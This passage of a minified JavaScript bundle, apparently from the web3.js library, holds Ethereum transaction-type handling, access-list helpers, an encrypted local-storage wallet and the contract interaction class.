                        if (1 === r) return o.AccessListEIP2930Transaction.fromTxData(e, t);
                        if (2 === r) return i.FeeMarketEIP1559Transaction.fromTxData(e, t);
                        throw new Error(`Tx instantiation with type ${r} not supported`);
                    }
                    static fromSerializedData(e, t = {}) {
                        if (!(e[0] <= 127)) return s.Transaction.fromSerializedTx(e, t);
                        switch(e[0]){
                            case 1:
                                return o.AccessListEIP2930Transaction.fromSerializedTx(e, t);
                            case 2:
                                return i.FeeMarketEIP1559Transaction.fromSerializedTx(e, t);
                            default:
                                throw new Error(`TypedTransaction with ID ${e[0]} unknown`);
                        }
                    }
                    static fromBlockBodyData(e, t = {}) {
                        if (e instanceof Uint8Array) return this.fromSerializedData(e, t);
                        if (Array.isArray(e)) return s.Transaction.fromValuesArray(e, t);
                        throw new Error("Cannot decode transaction: unknown type input");
                    }
                };
            },
            9964: (e, t)=>{
                "use strict";
                function r(e) {
                    if (0 === e.length) return !0;
                    const t = e[0];
                    return !!Array.isArray(t);
                }
                var n;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isAccessList = t.isAccessListUint8Array = t.Capability = void 0, (n = t.Capability || (t.Capability = {}))[n.EIP155ReplayProtection = 155] = "EIP155ReplayProtection", n[n.EIP1559FeeMarket = 1559] = "EIP1559FeeMarket", n[n.EIP2718TypedTransaction = 2718] = "EIP2718TypedTransaction", n[n.EIP2930AccessLists = 2930] = "EIP2930AccessLists", t.isAccessListUint8Array = r, t.isAccessList = function(e) {
                    return !r(e);
                };
            },
            4562: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getDataFeeEIP2930 = t.getAccessListJSON = t.verifyAccessList = t.getAccessListData = t.checkMaxInitCodeSize = void 0;
                const n = r(9634), i = r(2290), o = r(9964);
                t.checkMaxInitCodeSize = (e, t)=>{
                    const r = e.param("vm", "maxInitCodeSize");
                    if (r && BigInt(t) > r) throw new Error(`the initcode size of this transaction is too large: it is ${t} while the max is ${e.param("vm", "maxInitCodeSize")}`);
                }, t.getAccessListData = (e)=>{
                    let t, r;
                    if ((0, o.isAccessList)(e)) {
                        t = e;
                        const n = [];
                        for(let t = 0; t < e.length; t += 1){
                            const r = e[t], o = (0, i.toUint8Array)(r.address), s = [];
                            for(let e = 0; e < r.storageKeys.length; e += 1)s.push((0, i.toUint8Array)(r.storageKeys[e]));
                            n.push([
                                o,
                                s
                            ]);
                        }
                        r = n;
                    } else {
                        r = null != e ? e : [];
                        const i = [];
                        for(let e = 0; e < r.length; e += 1){
                            const t = r[e], o = (0, n.bytesToHex)(t[0]), s = [];
                            for(let e = 0; e < t[1].length; e += 1)s.push((0, n.bytesToHex)(t[1][e]));
                            const a = {
                                address: o,
                                storageKeys: s
                            };
                            i.push(a);
                        }
                        t = i;
                    }
                    return {
                        AccessListJSON: t,
                        accessList: r
                    };
                }, t.verifyAccessList = (e)=>{
                    for(let t = 0; t < e.length; t += 1){
                        const r = e[t], n = r[0], i = r[1];
                        if (void 0 !== r[2]) throw new Error("Access list item cannot have 3 elements. It can only have an address, and an array of storage slots.");
                        if (20 !== n.length) throw new Error("Invalid EIP-2930 transaction: address length should be 20 bytes");
                        for(let e = 0; e < i.length; e += 1)if (32 !== i[e].length) throw new Error("Invalid EIP-2930 transaction: storage slot length should be 32 bytes");
                    }
                }, t.getAccessListJSON = (e)=>{
                    const t = [];
                    for(let r = 0; r < e.length; r += 1){
                        const o = e[r], s = {
                            address: (0, n.bytesToHex)((0, i.setLengthLeft)(o[0], 20)),
                            storageKeys: []
                        }, a = o && o[1];
                        for(let e = 0; e < a.length; e += 1){
                            const t = a[e];
                            s.storageKeys.push((0, n.bytesToHex)((0, i.setLengthLeft)(t, 32)));
                        }
                        t.push(s);
                    }
                    return t;
                }, t.getDataFeeEIP2930 = (e, t)=>{
                    const r = t.param("gasPrices", "accessListStorageKeyCost"), n = t.param("gasPrices", "accessListAddressCost");
                    let i = 0;
                    for(let t = 0; t < e.length; t += 1)i += e[t][1].length;
                    return e.length * Number(n) + i * Number(r);
                };
            },
            4874: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            8632: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Wallet = void 0;
                const i = r(9970), o = r(7345);
                class s extends i.Web3BaseWallet {
                    constructor(){
                        super(...arguments), this._addressMap = new Map, this._defaultKeyName = "web3js_wallet";
                    }
                    static getStorage() {
                        let e;
                        try {
                            e = window.localStorage;
                            const t = "__storage_test__";
                            return e.setItem(t, t), e.removeItem(t), e;
                        } catch (t) {
                            return !t || 22 !== t.code && 1014 !== t.code && "QuotaExceededError" !== t.name && "NS_ERROR_DOM_QUOTA_REACHED" !== t.name || (0, o.isNullish)(e) || 0 === e.length ? void 0 : e;
                        }
                    }
                    create(e) {
                        for(let t = 0; t < e; t += 1)this.add(this._accountProvider.create());
                        return this;
                    }
                    add(e) {
                        var t;
                        if ("string" == typeof e) return this.add(this._accountProvider.privateKeyToAccount(e));
                        let r = this.length;
                        return this.get(e.address) && (console.warn(`Account ${e.address.toLowerCase()} already exists.`), r = null !== (t = this._addressMap.get(e.address.toLowerCase())) && void 0 !== t ? t : r), this._addressMap.set(e.address.toLowerCase(), r), this[r] = e, this;
                    }
                    get(e) {
                        if ("string" == typeof e) {
                            const t = this._addressMap.get(e.toLowerCase());
                            return (0, o.isNullish)(t) ? void 0 : this[t];
                        }
                        return this[e];
                    }
                    remove(e) {
                        if ("string" == typeof e) {
                            const t = this._addressMap.get(e.toLowerCase());
                            return !(0, o.isNullish)(t) && (this._addressMap.delete(e.toLowerCase()), this.splice(t, 1), !0);
                        }
                        return !!this[e] && (this.splice(e, 1), !0);
                    }
                    clear() {
                        return this._addressMap.clear(), this.length = 0, this;
                    }
                    encrypt(e, t) {
                        return n(this, void 0, void 0, function*() {
                            return Promise.all(this.map((r)=>n(this, void 0, void 0, function*() {
                                    return r.encrypt(e, t);
                                })));
                        });
                    }
                    decrypt(e, t, r) {
                        return n(this, void 0, void 0, function*() {
                            const i = yield Promise.all(e.map((e)=>n(this, void 0, void 0, function*() {
                                    return this._accountProvider.decrypt(e, t, r);
                                })));
                            for (const e of i)this.add(e);
                            return this;
                        });
                    }
                    save(e, t) {
                        return n(this, void 0, void 0, function*() {
                            const r = s.getStorage();
                            if (!r) throw new Error("Local storage not available.");
                            return r.setItem(null != t ? t : this._defaultKeyName, JSON.stringify((yield this.encrypt(e)))), !0;
                        });
                    }
                    load(e, t) {
                        return n(this, void 0, void 0, function*() {
                            const r = s.getStorage();
                            if (!r) throw new Error("Local storage not available.");
                            const n = r.getItem(null != t ? t : this._defaultKeyName);
                            return n && (yield this.decrypt(JSON.parse(n) || [], e)), this;
                        });
                    }
                }
                t.Wallet = s;
            },
            2795: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.ALL_EVENTS_ABI = t.ALL_EVENTS = void 0, t.ALL_EVENTS = "ALLEVENTS", t.ALL_EVENTS_ABI = {
                    name: t.ALL_EVENTS,
                    signature: "",
                    type: "event",
                    inputs: []
                };
            },
            6658: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Contract = void 0;
                const i = r(6527), o = r(5071), s = r(6637), a = r(8381), u = r(9970), c = r(9634), l = r(7345), d = r(2795), h = r(5537), f = r(7388), p = r(3948), m = {
                    logs: f.LogsSubscription,
                    newHeads: s.NewHeadsSubscription,
                    newBlockHeaders: s.NewHeadsSubscription
                };
                class g extends i.Web3Context {
                    constructor(e, t, r, n, s){
                        var a, d, h;
                        const f = (0, p.isContractInitOptions)(t) ? t : (0, p.isContractInitOptions)(r) ? r : void 0;
                        if (!(0, l.isNullish)(f) && !(0, l.isNullish)(f.data) && !(0, l.isNullish)(f.input)) throw new o.ContractTransactionDataAndInputError({
                            data: f.data,
                            input: f.input
                        });
                        let y, v;
                        y = (0, p.isWeb3ContractContext)(t) ? t : (0, p.isWeb3ContractContext)(r) ? r : n, v = "object" == typeof t && "provider" in t ? t.provider : "object" == typeof r && "provider" in r ? r.provider : "object" == typeof n && "provider" in n ? n.provider : g.givenProvider, super(Object.assign(Object.assign({}, y), {
                            provider: v,
                            registeredSubscriptions: m
                        })), this.syncWithContext = !1, this._functions = {}, this._overloadedMethodAbis = new Map;
                        const b = (0, c.isDataFormat)(n) ? n : (0, c.isDataFormat)(r) ? r : null != s ? s : u.DEFAULT_RETURN_FORMAT, E = "string" == typeof t ? t : void 0;
                        this._parseAndSetJsonInterface(e, b), (0, l.isNullish)(E) || this._parseAndSetAddress(E, b), this.options = {
                            address: E,
                            jsonInterface: this._jsonInterface,
                            gas: null !== (a = null == f ? void 0 : f.gas) && void 0 !== a ? a : null == f ? void 0 : f.gasLimit,
                            gasPrice: null == f ? void 0 : f.gasPrice,
                            from: null == f ? void 0 : f.from,
                            input: null !== (d = null == f ? void 0 : f.input) && void 0 !== d ? d : null == f ? void 0 : f.data
                        }, this.syncWithContext = null !== (h = null == f ? void 0 : f.syncWithContext) && void 0 !== h && h, y instanceof i.Web3Context && this.subscribeToContextEvents(y), Object.defineProperty(this.options, "address", {
                            set: (e)=>this._parseAndSetAddress(e, b),
                            get: ()=>this._address
                        }), Object.defineProperty(this.options, "jsonInterface", {
                            set: (e)=>this._parseAndSetJsonInterface(e, b),
                            get: ()=>this._jsonInterface
                        });
                    }
                    get events() {
                        return this._events;
                    }
                    get methods() {
                        return this._methods;
                    }
                    clone() {
                        let e;
                        return e = this.options.address ? new g([
                            ...this._jsonInterface,
                            ...this._errorsInterface
                        ], this.options.address, {
                            gas: this.options.gas,
                            gasPrice: this.options.gasPrice,
                            from: this.options.from,
                            input: this.options.input,
                            provider: this.currentProvider,
                            syncWithContext: this.syncWithContext
                        }, this.getContextObject()) : new g([
                            ...this._jsonInterface,
                            ...this._errorsInterface
                        ], {
                            gas: this.options.gas,
                            gasPrice: this.options.gasPrice,
                            from: this.options.from,
                            input: this.options.input,
                            provider: this.currentProvider,
                            syncWithContext: this.syncWithContext
                        }, this.getContextObject()), this.context && e.subscribeToContextEvents(this.context), e;
                    }
                    deploy(e) {
                        var t, r, i;
                        let s = this._jsonInterface.find((e)=>"constructor" === e.type);
                        s || (s = {
                            type: "constructor",
                            inputs: [],
                            stateMutability: ""
                        });
                        const a = (0, c.format)({
                            format: "bytes"
                        }, null !== (r = null !== (t = null == e ? void 0 : e.input) && void 0 !== t ? t : null == e ? void 0 : e.data) && void 0 !== r ? r : this.options.input, u.DEFAULT_RETURN_FORMAT);
                        if (!a || "0x" === a.trim()) throw new o.Web3ContractError("contract creation without any data provided.");
                        const l = null !== (i = null == e ? void 0 : e.arguments) && void 0 !== i ? i : [], d = Object.assign(Object.assign({}, this.options), {
                            input: a
                        });
                        return {
                            arguments: l,
                            send: (e)=>{
                                const t = Object.assign({}, e);
                                return this._contractMethodDeploySend(s, l, t, d);
                            },
                            estimateGas: (e, t = u.DEFAULT_RETURN_FORMAT)=>n(this, void 0, void 0, function*() {
                                    const r = Object.assign({}, e);
                                    return this._contractMethodEstimateGas({
                                        abi: s,
                                        params: l,
                                        returnFormat: t,
                                        options: r,
                                        contractOptions: d
                                    });
                                }),
                            encodeABI: ()=>(0, h.encodeMethodABI)(s, l, (0, c.format)({
                                    format: "bytes"
                                }, a, u.DEFAULT_RETURN_FORMAT))
                        };
                    }
                    getPastEvents(e, t, r) {
                        var i;
                        return n(this, void 0, void 0, function*() {
                            const n = "string" == typeof e ? e : "allEvents", a = "string" == typeof e || (0, c.isDataFormat)(e) ? (0, c.isDataFormat)(t) ? {} : t : e, l = (0, c.isDataFormat)(e) ? e : (0, c.isDataFormat)(t) ? t : null != r ? r : u.DEFAULT_RETURN_FORMAT, f = "allEvents" === n ? d.ALL_EVENTS_ABI : this._jsonInterface.find((e)=>"name" in e && e.name === n);
                            if (!f) throw new o.Web3ContractError(`Event ${n} not found.`);
                            const { fromBlock: p, toBlock: m, topics: g, address: y } = (0, h.encodeEventABI)(this.options, f, null != a ? a : {}), v = (yield (0, s.getLogs)(this, {
                                fromBlock: p,
                                toBlock: m,
                                topics: g,
                                address: y
                            }, l)).map((e)=>"string" == typeof e ? e : (0, h.decodeEventABI)(f, e, this._jsonInterface, l)), b = null !== (i = null == a ? void 0 : a.filter) && void 0 !== i ? i : {}, E = Object.keys(b);
                            return E.length > 0 ? v.filter((e)=>"string" == typeof e || E.every((t)=>{
                                    var r;
                                    if (Array.isArray(b[t])) return b[t].some((r)=>String(e.returnValues[t]).toUpperCase() === String(r).toUpperCase());
                                    const n = null === (r = f.inputs) || void 0 === r ? void 0 : r.filter((e)=>e.name === t)[0];
                                    return !(!(null == n ? void 0 : n.indexed) || "string" !== n.type || (0, c.keccak256)(b[t]) !== String(e.returnValues[t])) || String(e.returnValues[t]).toUpperCase() === String(b[t]).toUpperCase();
                                })) : v;
                        });
                    }
                    _parseAndSetAddress(e, t = u.DEFAULT_RETURN_FORMAT) {
                        this._address = e ? (0, c.toChecksumAddress)((0, c.format)({
                            format: "address"
                        }, e, t)) : e;
                    }
                    _parseAndSetJsonInterface(e, t = u.DEFAULT_RETURN_FORMAT) {
                        var r, n, i, o, s;
                        this._functions = {}, this._methods = {}, this._events = {};
                        let c = [];
                        const l = e.filter((e)=>"error" !== e.type), h = e.filter((e)=>(0, a.isAbiErrorFragment)(e));
                        for (const e of l){
                            const u = Object.assign(Object.assign({}, e), {
                                signature: ""
                            });
                            if ((0, a.isAbiFunctionFragment)(u)) {
                                const e = (0, a.jsonInterfaceMethodToString)(u), t = (0, a.encodeFunctionSignature)(e);
                                u.signature = t, u.constant = null !== (n = (r = "view" === u.stateMutability, void 0 !== r) ? r : "pure" === u.stateMutability) && void 0 !== n ? n : u.constant, u.payable = (i = "payable" === u.stateMutability, void 0 !== i) ? i : u.payable, this._overloadedMethodAbis.set(u.name, [
                                    ...null !== (o = this._overloadedMethodAbis.get(u.name)) && void 0 !== o ? o : [],
                                    u
                                ]);
                                const c = null !== (s = this._overloadedMethodAbis.get(u.name)) && void 0 !== s ? s : [], l = this._createContractMethod(c, h);
                                this._functions[e] = {
                                    signature: t,
                                    method: l
                                }, this._methods[u.name] = this._functions[e].method, this._methods[e] = this._functions[e].method, this._methods[t] = this._functions[e].method;
                            } else if ((0, a.isAbiEventFragment)(u)) {
                                const e = (0, a.jsonInterfaceMethodToString)(u), r = (0, a.encodeEventSignature)(e), n = this._createContractEvent(u, t);
                                u.signature = r, e in this._events && "bound" !== u.name || (this._events[e] = n), this._events[u.name] = n, this._events[r] = n;
                            }
                            this._events.allEvents = this._createContractEvent(d.ALL_EVENTS_ABI, t), c = [
                                ...c,
                                u
                            ];
                        }
                        this._jsonInterface = [
                            ...c
                        ], this._errorsInterface = h;
                    }
                    _getAbiParams(e, t) {
                        var r;
                        try {
                            return l.utils.transformJsonDataToAbiFormat(null !== (r = e.inputs) && void 0 !== r ? r : [], t);
                        } catch (t) {
                            throw new o.Web3ContractError(`Invalid parameters for method ${e.name}: ${t.message}`);
                        }
                    }
                    _createContractMethod(e, t) {
                        const r = e[e.length - 1];
                        return (...e)=>{
                            var i, o;
                            let s;
                            const a = null !== (i = this._overloadedMethodAbis.get(r.name)) && void 0 !== i ? i : [];
                            let c = a[0];
                            const d = t, f = a.filter((t)=>{
                                var r;
                                return (null !== (r = t.inputs) && void 0 !== r ? r : []).length === e.length;
                            });
                            if (1 === a.length || 0 === f.length) s = this._getAbiParams(c, e), l.validator.validate(null !== (o = r.inputs) && void 0 !== o ? o : [], s);
                            else {
                                const t = [];
                                for (const r of f)try {
                                    s = this._getAbiParams(r, e), l.validator.validate(r.inputs, s), c = r;
                                    break;
                                } catch (e) {
                                    t.push(e);
                                }
                                if (t.length === f.length) throw new l.Web3ValidatorError(t);
                            }
                            const p = {
                                arguments: s,
                                call: (e, t)=>n(this, void 0, void 0, function*() {
                                        return this._contractMethodCall(c, s, d, e, t);
                                    }),
                                send: (e)=>this._contractMethodSend(c, s, d, e),
                                estimateGas: (e, t = u.DEFAULT_RETURN_FORMAT)=>n(this, void 0, void 0, function*() {
                                        return this._contractMethodEstimateGas({
                                            abi: c,
                                            params: s,
                                            returnFormat: t,
                                            options: e
                                        });
                                    }),
                                encodeABI: ()=>(0, h.encodeMethodABI)(c, s),
                                createAccessList: (e, t)=>n(this, void 0, void 0, function*() {
                                        return this._contractMethodCreateAccessList(c, s, d, e, t);
                                    })
                            };
                            return c.stateMutability, p;
                        };
                    }
                    _contractMethodCall(e, t, r, i, c) {
                        var l;
                        return n(this, void 0, void 0, function*() {
                            const n = (0, p.getEthTxCallParams)({
                                abi: e,
                                params: t,
                                options: i,
                                contractOptions: Object.assign(Object.assign({}, this.options), {
                                    from: null !== (l = this.options.from) && void 0 !== l ? l : this.config.defaultAccount
                                })
                            });
                            try {
                                const t = yield (0, s.call)(this, n, c, u.DEFAULT_RETURN_FORMAT);
                                return (0, h.decodeMethodReturn)(e, t);
                            } catch (e) {
                                throw e instanceof o.ContractExecutionError && (0, a.decodeContractErrorData)(r, e.innerError), e;
                            }
                        });
                    }
                    _contractMethodCreateAccessList(e, t, r, i, c) {
                        var l;
                        return n(this, void 0, void 0, function*() {
                            const n = (0, p.getCreateAccessListParams)({
                                abi: e,
                                params: t,
                                options: i,
                                contractOptions: Object.assign(Object.assign({}, this.options), {
                                    from: null !== (l = this.options.from) && void 0 !== l ? l : this.config.defaultAccount
                                })
                            });
                            try {
                                return (0, s.createAccessList)(this, n, c, u.DEFAULT_RETURN_FORMAT);
                            } catch (e) {
                                throw e instanceof o.ContractExecutionError && (0, a.decodeContractErrorData)(r, e.innerError), e;
                            }
                        });
                    }
                    _contractMethodSend(e, t, r, n, i) {
                        var c, l;
                        let d = null != i ? i : this.options;
                        d = Object.assign(Object.assign({}, d), {
                            input: void 0,
                            from: null !== (l = null !== (c = d.from) && void 0 !== c ? c : this.defaultAccount) && void 0 !== l ? l : void 0
                        });
                        const h = (0, p.getSendTxParams)({
                            abi: e,
                            params: t,
                            options: n,
                            contractOptions: d
                        }), f = (0, s.sendTransaction)(this, h, u.DEFAULT_RETURN_FORMAT, {
                            checkRevertBeforeSending: !1
                        });
                        return f.on("error", (e)=>{
                            e instanceof o.ContractExecutionError && (0, a.decodeContractErrorData)(r, e.innerError);
                        }), f;
                    }
                    _contractMethodDeploySend(e, t, r, n) {
                        var i, a;
                        let c = null != n ? n : this.options;
                        c = Object.assign(Object.assign({}, c), {
                            from: null !== (a = null !== (i = c.from) && void 0 !== i ? i : this.defaultAccount) && void 0 !== a ? a : void 0
                        });
                        const l = (0, p.getSendTxParams)({
                            abi: e,
                            params: t,
                            options: r,
                            contractOptions: c
                        });
                        return (0, s.sendTransaction)(this, l, u.DEFAULT_RETURN_FORMAT, {
                            transactionResolver: (e)=>{
                                if (e.status === BigInt(0)) throw new o.Web3ContractError("code couldn't be stored", e);
                                const t = this.clone();
                                return t.options.address = e.contractAddress, t;
                            },
                            checkRevertBeforeSending: !1
                        });
                    }
                    _contractMethodEstimateGas({ abi: e, params: t, returnFormat: r, options: i, contractOptions: o }) {
                        return n(this, void 0, void 0, function*() {
                            const n = (0, p.getEstimateGasParams)({
                                abi: e,
                                params: t,
                                options: i,
                                contractOptions: null != o ? o : this.options
                            });
                            return (0, s.estimateGas)(this, n, u.BlockTags.LATEST, r);
                        });
                    }
                    _createContractEvent(e, t = u.DEFAULT_RETURN_FORMAT) {
                        return (...r)=>{
                            var n;
                            const { topics: i, fromBlock: s } = (0, h.encodeEventABI)(this.options, e, r[0]), a = new f.LogsSubscription({
                                address: this.options.address,
                                topics: i,
                                abi: e,
                                jsonInterface: this._jsonInterface
                            }, {
                                subscriptionManager: this.subscriptionManager,
                                returnFormat: t
                            });
                            return (0, l.isNullish)(s) || this.getPastEvents(e.name, {
                                fromBlock: s,
                                topics: i
                            }, t).then((e)=>{
                                e.forEach((e)=>a.emit("data", e));
                            }).catch(()=>{
                                a.emit("error", new o.SubscriptionError("Failed to get past events."));
                            }), null === (n = this.subscriptionManager) || void 0 === n || n.addSubscription(a).catch(()=>{
                                a.emit("error", new o.SubscriptionError("Failed to subscribe."));
                            }), a;
                        };
                    }
                    subscribeToContextEvents(e) {
                        const t = this;
                        this.context = e, t.syncWithContext && e.on(i.Web3ConfigEvent.CONFIG_CHANGE, (e)=>{
                            t.setConfig({
                                [e.name]: e.newValue
                            });
                        });
                    }
                }
                t.Contract = g;
            },
            5537: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.decodeMethodReturn = t.encodeMethodABI = t.decodeEventABI = t.encodeEventABI = void 0;
                const n = r(9634), i = r(9970), o = r(8381), s = r(6637), a = r(5071);
                t.encodeEventABI = ({ address: e }, t, r)=>{
                    var a, u;
                    const c = null == r ? void 0 : r.topics, l = null !== (a = null == r ? void 0 : r.filter) && void 0 !== a ? a : {}, d = {};
                    if ((0, n.isNullish)(null == r ? void 0 : r.fromBlock) || (d.fromBlock = (0, n.format)(s.blockSchema.properties.number, null == r ? void 0 : r.fromBlock, {
                        number: i.FMT_NUMBER.HEX,
                        bytes: i.FMT_BYTES.HEX
                    })), (0, n.isNullish)(null == r ? void 0 : r.toBlock) || (d.toBlock = (0, n.format)(s.blockSchema.properties.number, null == r ? void 0 : r.toBlock, {
                        number: i.FMT_NUMBER.HEX,
                        bytes: i.FMT_BYTES.HEX
                    })), c && Array.isArray(c)) d.topics = [
                        ...c
                    ];
                    else if (d.topics = [], t && !t.anonymous && "ALLEVENTS" !== t.name && d.topics.push(null !== (u = t.signature) && void 0 !== u ? u : (0, o.encodeEventSignature)((0, o.jsonInterfaceMethodToString)(t))), "ALLEVENTS" !== t.name && t.inputs) for (const e of t.inputs){
                        if (!e.indexed) continue;
                        const t = l[e.name];
                        t ? Array.isArray(t) ? d.topics.push(t.map((t)=>(0, o.encodeParameter)(e.type, t))) : "string" === e.type ? d.topics.push((0, n.keccak256)(t)) : d.topics.push((0, o.encodeParameter)(e.type, t)) : d.topics.push(null);
                    }
                    return d.topics.length || delete d.topics, e && (d.address = e.toLowerCase()), d;
                }, t.decodeEventABI = (e, t, r, a = i.DEFAULT_RETURN_FORMAT)=>{
                    var u, c, l, d, h;
                    let f = Object.assign({}, e);
                    const p = (0, n.format)(s.logSchema, t, a);
                    if ("ALLEVENTS" === f.name) f = r.find((e)=>e.signature === t.topics[0]) || {
                        anonymous: !0
                    };
                    if (f.inputs = null !== (c = null !== (u = f.inputs) && void 0 !== u ? u : e.inputs) && void 0 !== c ? c : [], !f.anonymous) {
                        let e = 0;
                        (null !== (l = f.inputs) && void 0 !== l ? l : []).forEach((t)=>{
                            t.indexed && (e += 1);
                        }), e > 0 && (null == t ? void 0 : t.topics) && (null == t ? void 0 : t.topics.length) !== e + 1 && (f = Object.assign(Object.assign({}, f), {
                            anonymous: !0,
                            inputs: []
                        }));
                    }
                    const m = f.anonymous ? t.topics : (null !== (d = t.topics) && void 0 !== d ? d : []).slice(1);
                    return Object.assign(Object.assign({}, p), {
                        returnValues: (0, o.decodeLog)([
                            ...null !== (h = f.inputs) && void 0 !== h ? h : []
                        ], t.data, m),
                        event: f.name,
                        signature: !f.anonymous && t.topics && 0 !== t.topics.length && t.topics[0] ? t.topics[0] : void 0,
                        raw: {
                            data: t.data,
                            topics: t.topics
                        }
                    });
                }, t.encodeMethodABI = (e, t, r)=>{
                    const n = Array.isArray(e.inputs) ? e.inputs.length : 0;
                    if (n !== t.length) throw new a.Web3ContractError(`The number of arguments is not matching the methods required number. You need to pass ${n} arguments.`);
                    const i = (0, o.encodeParameters)(Array.isArray(e.inputs) ? e.inputs : [], t).replace("0x", "");
                    if ((0, o.isAbiConstructorFragment)(e)) {
                        if (!r) throw new a.Web3ContractError("The contract has no contract data option set. This is necessary to append the constructor parameters.");
                        return r.startsWith("0x") ? `${r}${i}` : `0x${r}${i}`;
                    }
                    return `${(0, o.encodeFunctionSignature)(e)}${i}`;
                }, t.decodeMethodReturn = (e, t)=>{
                    if ("constructor" === e.type) return t;
                    if (!t) return null;
                    const r = t.length >= 2 ? t.slice(2) : t;
                    if (!e.outputs) return null;
                    const n = (0, o.decodeParameters)([
                        ...e.outputs
                    ], r);
                    return 1 === n.__length__ ? n[0] : n;
                };
            },
            3211: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
                const o = r(6658);
                i(r(5537), t), i(r(6658), t), i(r(7388), t), i(r(3951), t), t.default = o.Contract;
            },
            7388: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.LogsSubscription = void 0;
                const n = r(6527), i = r(5537);
                class o extends n.Web3Subscription {
                    constructor(e, t){
                        super(e, t), this.address = e.address, this.topics = e.topics, this.abi = e.abi, this.jsonInterface = e.jsonInterface;
                    }
                    _buildSubscriptionParams() {
                        return [
                            "logs",
                            {
                                address: this.address,
                                topics: this.topics
                            }
                        ];
                    }
                    _processSubscriptionResult(e) {
                        const t = (0, i.decodeEventABI)(this.abi, e, this.jsonInterface, super.returnFormat);
                        this.emit("data", t);
                    }
                }
                t.LogsSubscription = o;
            },
            3951: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                });
            },
            3948: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getCreateAccessListParams = t.isWeb3ContractContext = t.isContractInitOptions = t.getEstimateGasParams = t.getEthTxCallParams = t.getSendTxParams = void 0;
                const n = r(5071), i = r(9634), o = r(5537);
                t.getSendTxParams = ({ abi: e, params: t, options: r, contractOptions: s })=>{
                    var a, u;
                    if (!(null !== (u = null !== (a = null == r ? void 0 : r.input) && void 0 !== a ? a : null == r ? void 0 : r.data) && void 0 !== u ? u : s.input) && !(null == r ? void 0 : r.to) && !s.address) throw new n.Web3ContractError("Contract address not specified");
                    if (!(null == r ? void 0 : r.from) && !s.from) throw new n.Web3ContractError('Contract "from" address not specified');
                    let c = (0, i.mergeDeep)({
                        to: s.address,
                        gas: s.gas,
                        gasPrice: s.gasPrice,
                        from: s.from,
                        input: s.input,
                        maxPriorityFeePerGas: s.maxPriorityFeePerGas,
                        maxFeePerGas: s.maxFeePerGas
                    }, r);
                    return c.input && "constructor" !== e.type || (c = Object.assign(Object.assign({}, c), {
                        input: (0, o.encodeMethodABI)(e, t, c.input)
                    })), c;
                }, t.getEthTxCallParams = ({ abi: e, params: t, options: r, contractOptions: s })=>{
                    if (!(null == r ? void 0 : r.to) && !s.address) throw new n.Web3ContractError("Contract address not specified");
                    let a = (0, i.mergeDeep)({
                        to: s.address,
                        gas: s.gas,
                        gasPrice: s.gasPrice,
                        from: s.from,
                        input: s.input,
                        maxPriorityFeePerGas: s.maxPriorityFeePerGas,
                        maxFeePerGas: s.maxFeePerGas
                    }, r);
                    return a = Object.assign(Object.assign({}, a), {
                        input: (0, o.encodeMethodABI)(e, t, a.input ? (0, i.toHex)(a.input) : void 0)
                    }), a;
                }, t.getEstimateGasParams = ({ abi: e, params: t, options: r, contractOptions: n })=>{
                    let s = (0, i.mergeDeep)({
                        to: n.address,
                        gas: n.gas,
                        gasPrice: n.gasPrice,
                        from: n.from,
                        input: n.input
                    }, r);
                    return s = Object.assign(Object.assign({}, s), {
                        input: (0, o.encodeMethodABI)(e, t, s.input ? (0, i.toHex)(s.input) : void 0)
                    }), s;
                }, t.isContractInitOptions = (e)=>"object" == typeof e && !(0, i.isNullish)(e) && [
                        "input",
                        "data",
                        "from",
                        "gas",
                        "gasPrice",
                        "gasLimit",
                        "address",
                        "jsonInterface",
                        "syncWithContext"
                    ].some((t)=>t in e), t.isWeb3ContractContext = (e)=>"object" == typeof e && !(0, i.isNullish)(e) && !(0, t.isContractInitOptions)(e), t.getCreateAccessListParams = ({ abi: e, params: t, options: r, contractOptions: s })=>{
                    if (!(null == r ? void 0 : r.to) && !s.address) throw new n.Web3ContractError("Contract address not specified");
                    if (!(null == r ? void 0 : r.from) && !s.from) throw new n.Web3ContractError('Contract "from" address not specified');
                    let a = (0, i.mergeDeep)({
